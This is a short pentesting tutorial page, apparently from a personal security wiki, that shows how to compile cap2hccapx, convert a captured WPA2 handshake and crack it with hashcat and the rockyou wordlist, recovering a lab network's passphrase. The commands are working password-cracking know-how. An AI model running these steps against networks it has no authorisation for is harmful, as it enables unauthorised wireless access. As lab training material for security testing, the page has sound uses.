> For the complete documentation index, see [llms.txt](https://repo.4pfsec.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://repo.4pfsec.com/wireless-penetration-testing/wifi-pineapple-tetra/cracking-wpa2-handshake.md).

# Cracking WPA2 Handshake

## Cracking

We need to convert the captured `.pcap` file into `.hccapx` format in order to start cracking with it. There's a tool named `cap2hccapx` which can help us do this. However, we first need to download and compile it on our unix system.

### **Compiling cap2hccapx**

* Downloading Source

```
wget https://raw.githubusercontent.com/hashcat/hashcat-utils/master/src/cap2hccapx.c
```

![](/files/-Mg_ri2Imxu7XR8RIqzL)

* Compiling Tool

```
gcc -o cap2hccapx cap2hccapx.c
```

![](/files/-Mg_rp0ubtLrZTalSH_2)

* Testing Tool

```
./cap2hccapx
```

![](/files/-Mg_ru-YjmYXEsMWri2W)

### Converting

Now that we have the tool compiled and ready to go, we can convert the file and prep it for cracking!

```
cap2hccapx E4-6F-13-FA-AD-E0_partial.pcap  capture.hccapx
```

![](/files/-Mg_rxUpxXeVWNQYZA5l)

### Cracking with .hccapx

I'll be using Hashcat for the cracking on my host machine. [Here's](https://4pfsec.com/hashcat-password-cracking/) a post where I explain why cracking on the host machine is better 😊!

```
.\hashcat.exe -m 2500 .\hashes\capture.hccapx .\wordlists\rockyou.txt --force
```

![](/files/-Mg_s-4sWEc87K4G-6Au)

{% hint style="success" %}
e46f13faade0:c6adf262679d:Nee2.4:**tinkerbell**

**tinkerbell** is the PSK of the network in question
{% endhint %}

We were successfully able to crack the handshake and retrieve the password to the lab network!
